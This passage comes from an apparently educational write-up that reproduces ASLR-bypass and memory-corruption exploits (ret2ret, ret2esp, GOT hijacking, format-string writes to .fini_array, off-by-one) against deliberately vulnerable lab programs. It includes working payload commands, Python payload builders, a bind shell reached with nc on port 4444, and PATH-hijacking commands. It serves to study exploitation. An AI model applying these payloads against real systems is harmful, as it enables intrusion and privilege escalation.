<p>The main point to mention here is that the file we’re executing (here: <code>THIS</code>) does not necessarily have to spawn a shell. This file can contain any shell script we want. For example, if such a vulnerability occurs on a server reachable over the network, we cannot directly access the shell this script spawns if it just contains the <code>/bin/sh</code> command as in the example above. Thus, we might want to have a shell script that opens a reverse shell over the network or something similar.<br />
If and how such a vulnerability can be exploited of course differs from case to case and depends on how we can place the shell script on the vulnerable machine so that the vulnerable program actually executes it.</p>
<h3 id="function-pointers">Function pointers</h3>
<p>The same as for <a href="#string-pointers">string pointers</a> applies for function pointers. It is easy to find the addresses if such a vulnerability can be found.</p>
<p>In the given example, we can overwrite the function pointer with the address of <code>system</code>’s PLT entry. Thus, <code>system</code> is executed instead of the actual function. With the command <code>./funcptr &quot;$(python3 -c &quot;import sys; sys.stdout.buffer.write(b'A' * 64 + b'\xa0\x90\x04\x08')&quot;)&quot; /bin/sh</code>, we can spawn a shell. The first argument overwrites the pointer, the second argument contains the command to execute.</p>
<p>However, this kind of exploit is probably more powerful than the string pointer exploit: with the latter, we can only control which new program to execute. With the former, we can call whatever function we like. Theoretically, it is thus possible to not only call a specific function (here: <code>system</code>) but also to create a gadget chain that builds up our shellcode.<br />
This might be interesting in the context of the SUID bit being set: with a string pointer redirection, the program itself would already have to invoke <code>setuid</code> so that the sub-program we control has the elevated privileges. With a function pointer redirection and a ROP chain built up, we can execute whatever we want - e.g. the syscall for <code>setuid</code> and then spawn a shell with the elevated privileges we just obtained.</p>
<h2 id="integer-overflows">Integer overflows</h2>
<h3 id="width-overflow">Width overflow</h3>
<p>In the example in <a href="./ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/width.c">width.c</a>, a <code>char</code> is used to hold the length of the string. The problem that arises is that the maximum positive value of a <code>char</code> is 127 and the buffer size is fixed to 64. If we now input a string longer than 127 bytes (e.g. 128 bytes), we achieve an overflow and we can control the value of the <code>char</code> holding the string length. If we input for example a string with a length of 128 bytes, <code>isize</code> holds the value -128 after measuring the string length because of the overflow and we can copy the input to the buffer and achieve a buffer overflow.</p>
<p>For example with the command <code>./width $(python3 -c &quot;import sys; sys.stdout.buffer.write(b'A' * 88 + b'\xf6\x91\x04\x08' + b'A' * 36)&quot;)</code>, we jump to the secret function that is not used during normal execution. The first 88 bytes are used for padding until we reach the part of memory where the return address resides, the next four bytes overwrite the return address and the following 36 bytes are necessary to achieve a string length of 128 bytes and thus bypass the length check by overflowing the value of <code>isize</code>.</p>
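<p>The wrap-around of the length can be reproduced with <code>ctypes</code>, which stores a value in a signed 8 bit integer without overflow checking. The payload is the one from the command above; <code>as_signed_char</code> is a name chosen for this sketch.</p>
<div class="sourceCode"><pre class="sourceCode python"><code class="sourceCode python">import ctypes

def as_signed_char(length):
    """Value of a length after being stored in a signed 8-bit char."""
    return ctypes.c_int8(length).value

payload = b"A" * 88 + b"\xf6\x91\x04\x08" + b"A" * 36
isize = as_signed_char(len(payload))

# A negative length is smaller than the buffer size of 64, so a signed
# comparison against that size does not reject the input.
print(len(payload), isize)              # 128 -128</code></pre></div>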
<p>Just like with other methods above, this method could be used for building a ROP chain or similar. This is only possible because we have fixed addresses for ELF sections like <code>.text</code>, <code>.data</code> or <code>.bss</code>. Other addresses like the stack or the base address of libc are randomized which is why they are hard to exploit.</p>
<h3 id="signedness-bugs">Signedness bugs</h3>
<p>With this kind of bug we can overflow a buffer by giving a negative number. Copy functions (e.g. <code>memcpy</code>, <code>strncpy</code>, etc.) usually expect the size parameter to be an <em>unsigned</em> integer. When we now provide a negative number (i.e. a <em>signed</em> integer), it passes size checks, as it is smaller than the positive maximum size we check for. However, it is then interpreted as an unsigned number in the actual copy function which yields a huge number that reliably overflows the destination buffer.</p>
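<p>The mismatch between the signed check and the unsigned copy length can be illustrated as follows. The buffer size and both function names are hypothetical and not taken from <code>signedness.c</code>; a 32 bit <code>size_t</code> is assumed because the executables are compiled in 32 bit mode.</p>
<div class="sourceCode"><pre class="sourceCode python"><code class="sourceCode python">import ctypes

BUFFER_SIZE = 64                        # hypothetical destination size

def length_check_passes(length):
    """Signed comparison, as a naive bounds check would perform it."""
    return length &lt;= BUFFER_SIZE

def length_seen_by_copy(length):
    """The same value reinterpreted as an unsigned 32-bit size."""
    return ctypes.c_uint32(length).value

print(length_check_passes(-1), length_seen_by_copy(-1))   # True 4294967295</code></pre></div>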
<p>In the <a href="./ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/signedness.c">example</a> given for this kind of bug, we cannot control the content of the overflowed buffer and thus cannot redirect execution. However, we can still achieve a Denial of Service attack and crash the executable.<br />
The interesting part is that this can be achieved no matter what the security measures are. If we’re just aiming to crash the executable and such a bug is present, no stack protectors/canaries, ASLR mechanisms or other protection mechanisms can prevent us from successfully crashing the executable.</p>
<h2 id="stack-divulging-methods">Stack divulging methods</h2>
<h3 id="stack-stethoscope">Stack stethoscope</h3>
<p>With the help of the <code>/proc/PID/stat</code> file (where PID is the process id of the process we want to attack), we can find out the base stack address of a process. If we then also know the address of the buffer to overflow (e.g. found with GDB), we can calculate the offset of this buffer on the stack. With this offset, we can always calculate the correct address of the buffer where we put our shellcode.</p>
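<p>A minimal sketch of this calculation in Python: according to proc(5), field 28 of <code>/proc/PID/stat</code> is <code>startstack</code>, the address of the start (bottom) of the stack. The function names and the way the offset is passed in are assumptions for illustration.</p>
<div class="sourceCode"><pre class="sourceCode python"><code class="sourceCode python">def start_of_stack(stat_line):
    """Return field 28 (startstack) of a /proc/PID/stat line."""
    # The command name (field 2) is wrapped in parentheses and may contain
    # spaces, so split only the part after the last closing parenthesis.
    fields = stat_line.rsplit(")", 1)[1].split()
    return int(fields[28 - 3])          # fields[0] is field 3 (state)

def buffer_address(stack_base, offset):
    """Address of a buffer located offset bytes below the stack base."""
    return stack_base - offset

def read_start_of_stack(pid):
    """Read the stack base of a running process on Linux."""
    with open(f"/proc/{pid}/stat") as handle:
        return start_of_stack(handle.read())</code></pre></div>
<p>The offset is determined once (e.g. with GDB) as the stack base minus the buffer address and reused for every later run. Note that proc(5) marks <code>startstack</code> as subject to a ptrace access check, so the field may read as 0 for processes the reader is not allowed to trace.</p>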
<p>The only problem is that we always need the base stack address which changes from run to run. Thus, this attack is only feasible on programs that already run for a longer time when they expect us to provide input (i.e. not feasible for buffer overflows based on program call arguments), for example network daemons. As the <code>/proc/PID/stat</code> file is readable by anybody, we don’t even need special privileges, no matter what privileges the program to attack runs with.</p>
<p>An example can be found with the <a href="./ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/divulge.c">divulge</a> daemon: it expects input over the network and prints the same input back (more or less like a call to <code>cat</code> over the network). There is a buffer overflow vulnerability in <a href="./ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/divulge.c#L12">line 12</a> which copies the input into a buffer without checking for the size of the input. Thus, we can overwrite the return address with the address of the buffer itself that we calculated with the help of the stack base address and the offset and execute shellcode we put in the buffer.<br />
Weirdly, this exploit did not work with the SUID bit set on the daemon but only produced a segmentation fault. The same input without the SUID bit set works and spawns a shell. This issue should be investigated further.</p>
<h3 id="formatted-information">Formatted information</h3>
<p>In the <a href="#stack-stethoscope">stack stethoscope</a> section, local access to the machine was necessary in order to obtain the base of the stack by reading the corresponding <code>/proc/PID/stat</code> file. We now want to execute an exploit remotely, i.e. without accessing this file.</p>
<p>The approach for such an exploit is the following:</p>
<ul>
<li>Exploit the format string vulnerability: return an address from the stack</li>
<li>Get the offset of this address from the stack base address by looking into <code>/proc/PID/stat</code> once and calculating the offset<br />
This can also be done locally as we’re not looking for an address but only for an offset.</li>
<li>Send two requests:
<ol type="1">
<li>Get the address on the stack with the help of the format string vulnerability</li>
<li>Execute the stack buffer overflow</li>
</ol></li>
<li>Between the two requests: calculate address used for stack buffer overflow in the same manner as for the stack stethoscope</li>
</ul>
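<p>The arithmetic between the two requests can be sketched as follows. The reply format (a bare hexadecimal number) and both offsets are assumptions chosen for illustration; the real values depend on the daemon binary and have to be measured once as described above.</p>

```python
def parse_leak(response):
    """Interpret the reply to a '%x'-style request as a hexadecimal address."""
    return int(response.strip().decode("ascii"), 16)


def buffer_from_leak(leaked, leak_to_base, buffer_offset):
    """Derive the buffer address from a leaked stack address."""
    # The distance between the leaked value and the stack base is constant,
    # so it only has to be determined once (locally).
    stack_base = leaked + leak_to_base
    # From here on, the calculation is the same as for the stack stethoscope.
    return stack_base - buffer_offset


# Made-up reply and offsets, for illustration only.
leaked = parse_leak(b"bffff5a0\n")
print(hex(buffer_from_leak(leaked, 0x130, 0x200)))
```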
<p>We thus make use of both vulnerabilities: a format string vulnerability and a stack buffer overflow vulnerability. The actual exploit can then be conducted with the <a href="./ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/divexploit_remote.sh">divexploit_remote.sh</a> bash script. It already contains the necessary offset to calculate the stack base address.</p>
<p>When running <code>./divulge</code> in one terminal window and <code>./divexploit_remote.sh</code> in another, we can observe that a shell spawns in the terminal window of <code>./divulge</code>. This behavior makes sense: we’re executing shellcode in the daemon’s context. However, in real life this is inconvenient, as an attacker cannot enter commands into a shell that opens on the remote machine. Thus, compiling <a href="./ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/divexploit.c">divexploit.c</a> with shellcode spawning a bind shell makes more sense (<code>sc = net_shellcode;</code> instead of <code>sc = shellcode;</code> in <a href="./ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/divexploit.c#L14">line 14</a>). Instead of spawning a shell in the terminal window <code>./divulge</code> is running in, a shell is bound to a port given in the shellcode (here: 4444) so that the shell can be conveniently accessed remotely (here: <code>nc localhost 4444</code>).</p>
<h2 id="stack-juggling-methods">Stack juggling methods</h2>
<h3 id="ret2ret">ret2ret</h3>
<p>This approach aims to overwrite the least significant byte of a pointer on the stack with a null byte. Unless that byte already was <code>0x00</code>, the address becomes smaller and, as the stack grows towards lower addresses, points to a position later in the stack frame or even in a newer stack frame.</p>
<p>Such an overwrite is pretty easy: every string ends with a <code>0x00</code> byte. On a little endian machine, the least significant byte of a pointer is stored at the lowest address. When we overflow a buffer by exactly the right number of bytes, the terminating null byte therefore overwrites only this byte and leaves the rest of the pointer intact.</p>
<p>We thus want to overwrite a buffer as follows:</p>
<ul>
<li>Put a NOP sled in the start of the buffer</li>
<li>Put shellcode after the NOP sled but before the return address</li>
<li>Overwrite the return address and all following stack values with the address of a <code>ret</code> instruction from the executable up until the pointer in question</li>
</ul>
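<p>The layout described in the list above can be sketched as a small payload builder. This is not the original <code>ret2retexploit.c</code>: the distance to the return address, the chain length and the placeholder shellcode are hypothetical, and the <code>ret</code> address is merely an example value.</p>

```python
import struct

NOP = b"\x90"  # x86 no-operation instruction


def ret2ret_payload(shellcode, bytes_to_ret, ret_addr, chain_len):
    """NOP sled and shellcode up to the return address, then a chain of ret addresses."""
    if len(shellcode) > bytes_to_ret:
        raise ValueError("shellcode does not fit in front of the return address")
    sled = NOP * (bytes_to_ret - len(shellcode))
    chain = struct.pack("<I", ret_addr) * chain_len
    payload = sled + shellcode + chain
    # The string copy stops at the first null byte, so none may occur inside.
    if b"\x00" in payload:
        raise ValueError("payload must not contain null bytes")
    return payload


# Placeholder shellcode (int3 instructions) and hypothetical sizes.
payload = ret2ret_payload(b"\xcc" * 8, 264, 0x080491E6, 3)
print(len(payload))
```

<p>The null byte that clears the pointer’s least significant byte is not part of the payload; it is the string terminator appended by the copy operation.</p>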
<p>If we then execute the program, the following happens: the return address is overwritten with the address of a <code>ret</code> instruction which then returns to the next <code>ret</code> instruction and so on until we reach the pointer. If we’re lucky, the pointer then points into our NOP sled because we overwrote the last byte and the program returns to the shellcode. If we’re not lucky, the program just crashes.<br />
However, as the addresses are randomized, we just need to try several times until we succeed (as long as the offset to the shellcode is small enough so that overwriting a single byte is sufficient).</p>
<p>Therefore, calling <code>./ret2ret &quot;$(./ret2retexploit)&quot;</code> works most of the time but sometimes just yields a segmentation fault or encounters an illegal instruction.</p>
<h3 id="ret2pop">ret2pop</h3>
<p>The ret2pop approach is very similar. The difference is that it doesn’t modify a pointer before returning to it but returns to an existing pointer as it is (e.g. a pointer to the program call’s arguments).</p>
<p>As we’re looking for a perfect existing pointer, we don’t want to overwrite its last byte. Thus, the return chain is shortened by one and the last instruction is not a simple <code>ret</code>, but a <code>pop; ret</code>. Therefore, the program enters the return chain as above and returns from one <code>ret</code> instruction to the next until it encounters a <code>pop</code> instruction, then pops the last value between our return chain and the perfect pointer and finally returns to the perfect pointer (pointing to the shellcode).<br />
It doesn’t matter which register the <code>pop</code> instruction pops into, it is just important that it removes one word from the stack.</p>
<p>As we have a perfect pointer here (the pointer to <code>argv[1]</code>), the call <code>./ret2pop &quot;$(./ret2popexploit)&quot;</code> always works even without a NOP sled because we’re automatically pointing to the start of the shellcode without any address ambiguities.</p>
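<p>A minimal sketch of such a payload, assuming a hypothetical distance of 264 bytes to the return address and a chain of three <code>ret</code> addresses; the two gadget addresses are example values and the shellcode is a placeholder. It is not the original <code>ret2popexploit.c</code>.</p>

```python
import struct


def ret2pop_payload(shellcode, bytes_to_ret, ret_addr, popret_addr, ret_count):
    """Shellcode first, filler up to the return address, ret chain, final pop; ret."""
    if len(shellcode) > bytes_to_ret:
        raise ValueError("shellcode does not fit in front of the return address")
    # No NOP sled: the existing pointer refers to the very start of the string.
    filler = b"A" * (bytes_to_ret - len(shellcode))
    chain = struct.pack("<I", ret_addr) * ret_count
    # The last chain element skips one stack word and then returns.
    chain += struct.pack("<I", popret_addr)
    return shellcode + filler + chain


# Placeholder shellcode (int3 instructions) and hypothetical sizes.
payload = ret2pop_payload(b"\xcc" * 8, 264, 0x08049009, 0x08049243, 3)
print(len(payload))
```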
<h3 id="ret2esp">ret2esp</h3>
<p>The ret2esp approach is a little bit different in comparison to <a href="#ret2ret">ret2ret</a> and <a href="#ret2pop">ret2pop</a>. Instead of traversing the stack until we reach the shellcode, this approach jumps directly to the shellcode by finding a <code>jmp esp</code> instruction in the executable and pointing the return address to this instruction.</p>
<p>The interesting part here is that usually, the shellcode is placed on the stack before the return address, i.e. into the actual buffer we want to overflow. With this approach, the shellcode is placed on the stack after the return address, i.e. into the overflown part of the buffer.<br />
The <code>ret</code> instruction then pops the return address (i.e. the address of <code>jmp esp</code>) from the stack, so that the stack pointer afterwards points to the shellcode. When the <code>jmp esp</code> instruction is now executed, the program continues execution directly at the shellcode on the stack, as <code>esp</code> contains its address.</p>
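<p>The resulting layout (padding, address of <code>jmp esp</code>, shellcode) can be sketched like this. The padding length, the gadget address and the placeholder shellcode are hypothetical values chosen for illustration.</p>

```python
import struct


def ret2esp_payload(bytes_to_ret, jmp_esp_addr, shellcode):
    """Padding up to the return address, the gadget address, then the shellcode."""
    padding = b"A" * bytes_to_ret
    # After `ret` has popped this address, esp points right behind it,
    # i.e. at the first byte of the shellcode.
    return padding + struct.pack("<I", jmp_esp_addr) + shellcode


# Hypothetical distance and gadget address, placeholder shellcode (int3).
payload = ret2esp_payload(264, 0x080491B6, b"\xcc" * 8)
print(len(payload))
```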
<h3 id="ret2eax">ret2eax</h3>
<p>ret2eax works similarly to ret2esp: we don’t traverse the stack until we hit the shellcode but just overwrite the return address with the address of a single instruction. Here, the instruction we’re looking for is <code>call *%eax</code>. The compiler usually generates this instruction somewhere in the executable, even if not in our own code. Thus, it should be possible to find such an instruction.</p>
<p>This approach is based on the return behavior of functions: even if the caller doesn’t store the return value anywhere, it is still passed back in the register <code>eax</code>. In our exemplary code in <a href="./ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2eax.c">ret2eax.c</a>, we don’t save the return value of <code>strcpy</code>, which is a pointer to the destination buffer (i.e. the buffer that contains our shellcode). As the function <code>function</code> returns immediately after the call to <code>strcpy</code>, <code>eax</code> is not overwritten with another value and thus still contains the address of the buffer when returning.<br />
By overwriting the return address with the correct value, we can then return to the instruction <code>call *%eax</code> which lets the program continue execution directly at our shellcode.</p>
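<p>Finding a suitable instruction amounts to searching the executable code for the two bytes <code>ff d0</code>, the x86 encoding of <code>call *%eax</code>. The helper below is a hypothetical sketch that works on a byte string assumed to be mapped at <code>load_addr</code>; in practice, a disassembler such as <code>objdump</code> gives the same information.</p>

```python
CALL_EAX = b"\xff\xd0"  # x86 machine code of `call *%eax`


def find_gadget(image, opcode, load_addr):
    """Return the addresses of all occurrences of opcode inside image."""
    hits = []
    pos = image.find(opcode)
    while pos != -1:
        hits.append(load_addr + pos)
        pos = image.find(opcode, pos + 1)
    return hits


# Made-up code bytes, assumed to be loaded at 0x08049000.
image = b"\x90\xff\xd0\x90\x90\xff\xd0"
print([hex(addr) for addr in find_gadget(image, CALL_EAX, 0x08049000)])
```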
<h2 id="got-hijacking---ret2got">GOT hijacking - ret2got</h2>
<p>The ret2got exploit is pretty similar to the <a href="#function-pointers">function pointer redirection</a> exploit. During the latter exploit, we overwrite a function pointer with the address of the PLT entry of the <code>system</code> function. The function pointer we’re overwriting is located in the same function and thus also on the stack.</p>
<p>During the ret2got exploit, we’re also overwriting a function pointer: the GOT entry of <code>printf</code>. We overwrite a pointer to an array with the address of <code>printf</code>’s GOT entry and then overwrite this entry with the address of <code>system</code>’s PLT entry. The next call to <code>printf</code> then executes <code>system</code> instead with the arguments passed to <code>printf</code>.</p>
<p>As we can only partially control the arguments of <code>printf</code>, it is necessary to set up an environment similar to the one from the <a href="#string-pointers">string pointer redirection exploit</a>, where we cannot control the input to <code>system</code> but where we provide an executable shell script whose name matches the first word of the <code>system</code> argument. This script can be created by the command <code>echo /bin/sh &gt; Array &amp;&amp; chmod 777 Array &amp;&amp; export PATH=.:$PATH</code>. Calling <code>./ret2got &quot;$(python3 -c &quot;import sys; sys.stdout.buffer.write(b'A' * 8 + b'\x0c\xc0\x04\x08')&quot;)&quot; &quot;$(python3 -c &quot;import sys; sys.stdout.buffer.write(b'\xa0\x90\x04\x08')&quot;)&quot;</code> then yields the described exploit.</p>
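<p>The byte strings in this command are little endian encodings of two addresses. The following sketch decodes them; reading the first one as the GOT entry of <code>printf</code> and the second one as the PLT entry of <code>system</code> follows from the description above and is not verified against the binary here.</p>

```python
import struct

# First argument: 8 bytes of padding, then the new value of the array pointer.
got_printf = struct.unpack("<I", b"\x0c\xc0\x04\x08")[0]
# Second argument: the value that gets written through the redirected pointer.
plt_system = struct.unpack("<I", b"\xa0\x90\x04\x08")[0]

arg1 = b"A" * 8 + struct.pack("<I", got_printf)
arg2 = struct.pack("<I", plt_system)

print(hex(got_printf), hex(plt_system))
```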
<p>The steps to this exploit are combined into the <a href="./ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2gotexploit.sh">ret2gotexploit.sh</a> shell script.</p>
<p>Similar to the function pointer redirection exploit, we could theoretically overwrite <code>printf</code>’s GOT entry with whatever address we want. We could thus not only replace the function that is called but also create a ROP chain to which we point.</p>
<h2 id="off-by-one">Off by one</h2>
<p>The off-by-one vulnerability is a vulnerability that allows just overflowing the buffer by a single byte. This doesn’t sound like much but in some cases, this single byte might already be enough.</p>
<p>Because of little endian representation, such an overflow can at most affect the least significant byte of the saved frame pointer, which is located between the local variables and the return address on the stack. In the function epilogue, this pointer is popped into <code>ebp</code>, which in the epilogue of the calling function is moved into <code>esp</code>. Thus, we cannot directly control the program flow when returning from the vulnerable function but only when the program returns from the function that called the vulnerable function.</p>
<p>The overwritten byte usually gets turned into a <code>0x00</code> byte, as such a vulnerability most of the time occurs when copying a string and strings end with a <code>0x00</code> byte. Thus, we can lower the saved frame pointer and by some luck it might point back into the buffer that was used for the overflow.<br />
The strategy is then as follows:</p>
<ol type="1">
<li>Fill the buffer with a <code>ret</code> chain that ends in a <code>jmp esp</code> instruction (similar to the <a href="#ret2esp">ret2esp</a> exploit)</li>
<li>Place the shellcode after the address of such a <code>jmp esp</code> instruction (possibly padded with NOPs to achieve the correct buffer size and stack alignment)</li>
</ol>
<p>When passing such a buffer to a vulnerable function, <code>ebp</code> possibly (not necessarily because of ASLR, several attempts might be necessary) points into our buffer after the function epilogue. Upon the next function return, <code>esp</code> points into the <code>ret</code> chain in the buffer. Thus, when returning from the calling function, the <code>ret</code> chain from the buffer is executed and <code>esp</code> is increased up to the address of <code>jmp esp</code>. Then, this instruction is executed and as <code>esp</code> now points to the shellcode in the buffer, the shellcode is executed.</p>
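<p>Whether a given run is exploitable depends only on where the clobbered frame pointer ends up. A small sketch of this check, with made-up addresses and buffer sizes:</p>

```python
def clobbered_frame_pointer(saved_ebp):
    """Saved frame pointer after its least significant byte was set to 0x00."""
    return saved_ebp & 0xFFFFFF00


def lands_in_buffer(saved_ebp, buf_start, buf_len):
    """Check whether the clobbered frame pointer points into the buffer."""
    new_ebp = clobbered_frame_pointer(saved_ebp)
    return buf_start <= new_ebp < buf_start + buf_len


# Made-up values: a 256-byte buffer shortly below the saved frame pointer.
print(hex(clobbered_frame_pointer(0xBFFFF6D8)))
print(lands_in_buffer(0xBFFFF6D8, 0xBFFFF5D0, 256))
```

<p>The frame pointer is lowered by at most 255 bytes, so a small buffer or an unfortunate stack position makes the attempt fail.</p>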
<p>All in all, this exploit is a combination of previous techniques: firstly, it is similar to the <a href="#ret2ret">ret2ret</a> exploit which also depends on overwriting the last byte of a pointer. However, in that case, the pointer is not a saved frame pointer but a pointer residing in the program space. Secondly, it makes use of techniques from the <a href="#ret2esp">ret2esp</a> exploit to place shellcode on the stack and reliably jump to that shellcode.</p>
<h2 id="overwriting-.dtors">Overwriting .dtors</h2>
<p>This exploit uses a format string vulnerability to overwrite the <code>.dtors</code> section, which contains pointers to destructor functions that are run after the <code>main</code> function returns. The overwritten pointers should then point to an array on the heap containing shellcode to execute. It is thus more or less a ret2heap exploit, with the difference that it is not the return address that is overwritten by a simple stack buffer overflow but a destructor function pointer that is overwritten via a format string vulnerability.</p>
<p>There are several reasons why this exploit does not work exactly like that:</p>
<ol type="1">
<li>A <code>.dtors</code> section does not exist in executables created by modern compilers/linkers. There is a pretty much equivalent section, <code>.fini_array</code> which also contains pointers to functions which should be run after <code>main</code> returns. However, the structure is a little bit different, as <code>.dtors</code> has start and end markers (<code>0xffffffff</code> and <code>0x00000000</code>, respectively) which <code>.fini_array</code> does not have.</li>
<li>With modern ASLR, heap addresses are also completely randomized and we cannot use the heap to store the shellcode. A solution to that issue is storing the shellcode in a global array (which is located in the non-randomized <code>.bss</code> section of the ELF executable) instead. Thus, the exploit becomes a ret2bss exploit instead of ret2heap. It works exactly the same way, only the location of the shellcode is different.</li>
<li>In the paper by Tilo Müller, he puts the <code>.dtors</code> address at the start of the vulnerable string and refers to that address by the eighth format string placeholder. He thus has seven format string placeholders in front helping him to control the number to write to the address with the <code>%n</code> format string placeholder (e.g. by controlling the length of the output by <code>%.mx</code> where <code>m</code> is the length to output). Because of different behaviour with modern compilers, this is not the case anymore: when putting the address in the front of the string, the first format string placeholder automatically accesses this address. Thus, we can for example control the number to write via <code>%n</code> by padding the string with junk between the address and the <code>%n</code> placeholder. This is a problem because the command line (here: bash 5.0.16) only accepts strings up to a certain length as arguments to a program. Because hex addresses transformed into decimal numbers are huge and our padding thus has to be extremely long, we cannot directly write the address we want with the help of <code>%n</code>.<br />
When looking at the data in <code>.fini_array</code>, we see that the pointer located there points to an address starting with <code>0x0804</code>. The address located there thus is in the address space of our ELF executable. It is thus sufficient to overwrite only the lower two bytes of this pointer with the lower two bytes of the address of our array in the <code>.bss</code> section. This can be achieved by using <code>%hn</code> instead of <code>%n</code> as format string placeholder.<br />
As an alternative, we could also specifically refer to the address as the first parameter on the stack by <code>%1$.hn</code> and pad with <code>%.mx</code> where <code>m</code> is the length to output before as originally intended.</li>
<li>The <code>.fini_array</code> section is subject to RELRO (relocation read-only). Even though it is marked writable in the output of <code>readelf -S ret2dtors</code>, it is marked as read-only by the dynamic linker on program start. Thus, we only get a segmentation fault when trying to overwrite a pointer in this section as described above.<br />
The solution is to disable RELRO by passing the additional linker flag <code>-z norelro</code> when linking the executable.</li>
</ol>
<p>In conclusion, an exploit is possible (commands <code>./ret2dtors &quot;$(./shellcode)&quot; &quot;$(python3 -c &quot;import sys; sys.stdout.buffer.write(b'\x68\xb1\x04\x08' + b'A' * 45724 + b'%hn')&quot;)&quot;</code> or <code>./ret2dtors &quot;$(./shellcode)&quot; &quot;$(python3 -c &quot;import sys; sys.stdout.buffer.write(b'\x68\xb1\x04\x08 %.45722x %1$.hn')&quot;)&quot;</code> where <code>shellcode</code> is a helper executable just outputting shellcode (see <a href="./ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/shellcode.c">shellcode.c</a>)) but only with severe changes.<br />
Firstly, it is not possible to use the heap. We have to rely on an array in the <code>.bss</code> or <code>.data</code> section (cf. <a href="#ret2bss">ret2bss</a> and <a href="#ret2data">ret2data</a>), i.e. a global array.<br />
Secondly, we have to link the executable with RELRO disabled.</p>
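<p>The padding lengths in the two commands follow from the way <code>%hn</code> works: it stores the number of characters printed so far, truncated to 16 bits. Both commands print 45728 = <code>0xb2a0</code> characters before the write. The sketch below reproduces this arithmetic; the full target address <code>0x0804b2a0</code> is inferred from the <code>0x0804</code> prefix mentioned above and is not verified against the binary.</p>

```python
def hn_padding(target_addr, already_printed):
    """Characters still to print so that %hn stores the low 16 bits of target_addr."""
    low_half = target_addr & 0xFFFF
    # %hn stores the character count modulo 2**16.
    return (low_half - already_printed) % 0x10000


# Variant 1: 4 address bytes, then only junk characters before %hn.
print(hn_padding(0x0804B2A0, 4))
# Variant 2: 4 address bytes plus the two spaces around the %.mx placeholder.
print(hn_padding(0x0804B2A0, 4 + 2))
```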
<h2 id="optimizing-compilation-2">Optimizing compilation</h2>
<p>By default, no compiler optimizations were enabled when building the executables (i.e. <code>-O0</code> compiler flag which is active by default in GCC). This section describes the differences that occur when recompiling the executables with the <code>-O3</code> compiler flag, i.e. GCC’s highest optimization options enabled. The term “differences” here refers to necessary changes in the code base or command line commands to get the exploits to work or to significant interesting changes in program or memory layout.</p>
<h3 id="return-into-non-randomized-memory-1">Return into non-randomized memory</h3>
<p>For the <code>ret2text</code> executable, the only necessary change is to lower the padding by 4 bytes and change the address we want to jump to. This is because the optimized compilation output omits saving the <code>ebp</code> register to the stack (i.e. saving the frame pointer). Thus, the return address lies directly after the 12-byte buffer on the stack. In addition, the address of the <code>secret</code> function changes because GCC rearranges the functions.<br />
In conclusion, the command <code>./ret2text $(python3 -c &quot;import sys; sys.stdout.buffer.write(b'A' * 12 + b'\x60\x92\x04\x08')&quot;)</code> yields the same success <a href="#ret2text">as the previous command</a>. However, just calling <code>./ret2text $(python3 -c &quot;import sys; sys.stdout.buffer.write(b'A' * 12)&quot;)</code> does not work anymore, as the return address then does not point into the secret function anymore as it coincidentally was the case in the non-optimized version.</p>
<h3 id="pointer-redirecting-1">Pointer redirecting</h3>
<h4 id="string-pointers-1">String pointers</h4>
<p>The <code>strptr</code> executable suddenly is not exploitable anymore, at least not in the way it was intended. There is still a buffer overflow vulnerability which can be used to overwrite the return address.</p>
<p>However, the original exploit aimed to not overwrite the return address, but the pointer to the <code>conf</code> string in order to pass the <code>license</code> string to the <code>system</code> function instead. In the non-optimized executable, the addresses of the strings which are located in the <code>.rodata</code> section are loaded into variables on the stack (<code>char *conf</code> and <code>char *license</code>). Before executing <code>puts</code> and <code>system</code>, those addresses are taken from the stack and pushed onto the stack again as parameters to the functions. Thus, we can overwrite the stack variable <code>conf</code> with the value of <code>license</code>, i.e. the address of the other string.</p>
<p>In the optimized executable, the strings’ addresses aren’t loaded into stack variables anymore. They are directly pushed as hardcoded values onto the stack before <code>puts</code> or <code>system</code> are executed. Thus, there is simply no variable that we could overflow and thus pass another string to <code>system</code>.</p>
<p>As mentioned in the beginning, the stack buffer overflow vulnerability still exists. The <a href="./ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/strptrexploit_optimized.sh">strptrexploit_optimized.sh</a> shell script contains an exploit that still leverages this vulnerability. Instead of overwriting a string pointer, this exploit works like a classical exploit that overwrites the return address. Here, the return address is overwritten with the address of <code>system</code> from the executable’s procedure linkage table (PLT). Additionally, the address of the license string is put onto the stack after the address of <code>system</code>. Thus, on returning from <code>main</code>, the executable calls <code>system</code> with the string as parameter that we originally intended to pass to <code>system</code> by overwriting a string pointer.<br />
From this exploit follows that we can achieve exactly the same code execution as with the <a href="#string-pointers">exploit aiming at the non-optimized executable</a>.</p>
<p>The main difference is that this exploit relies on overwriting the return address. The original exploit is resilient against stack canaries, as it doesn’t tamper with control flow information (return address, saved frame pointer) but only with program data (the string pointers). The new exploit however fails in case of stack canaries being activated at compile time, as it strictly has to overwrite the return address.</p>
<h4 id="function-pointers-1">Function pointers</h4>
<p>A similar observation can be made concerning the <code>funcptr</code> executable.<br />
Instead of putting a function pointer variable <code>ptr</code> onto the stack, assigning the address of the function <code>function</code> to it and calling the function, GCC with optimizations enabled recognizes that the value of <code>ptr</code> does not depend on user input (apart from the buffer overflow) and also is not otherwise dynamic. Thus, this pointer is completely omitted and <code>function</code> is called directly without any pointer assignments.</p>
<p>This means that there is no pointer on the stack to overwrite so that we could make use of the buffer overflow to redirect such a pointer.</p>
<p>However, similar to the <a href="#string-pointers-1">string pointer redirection</a>, the buffer overflow vulnerability still exists and can be exploited. A possibility would be to overwrite the return address with the address of <code>system</code> in the PLT and pass a string address to it. As the only strings with known addresses are the arguments to <code>printf</code> and <code>system</code> in the function <code>function</code>, we’re very restricted here and basically could only execute code by creating an <code>echo</code> executable / shell script in a directory which is part of the PATH environment variable so that we override the original <code>echo</code> behavior. But for such an exploit, no buffer overflow is necessary, as <code>echo</code> is already executed inside of <code>function</code>.<br />
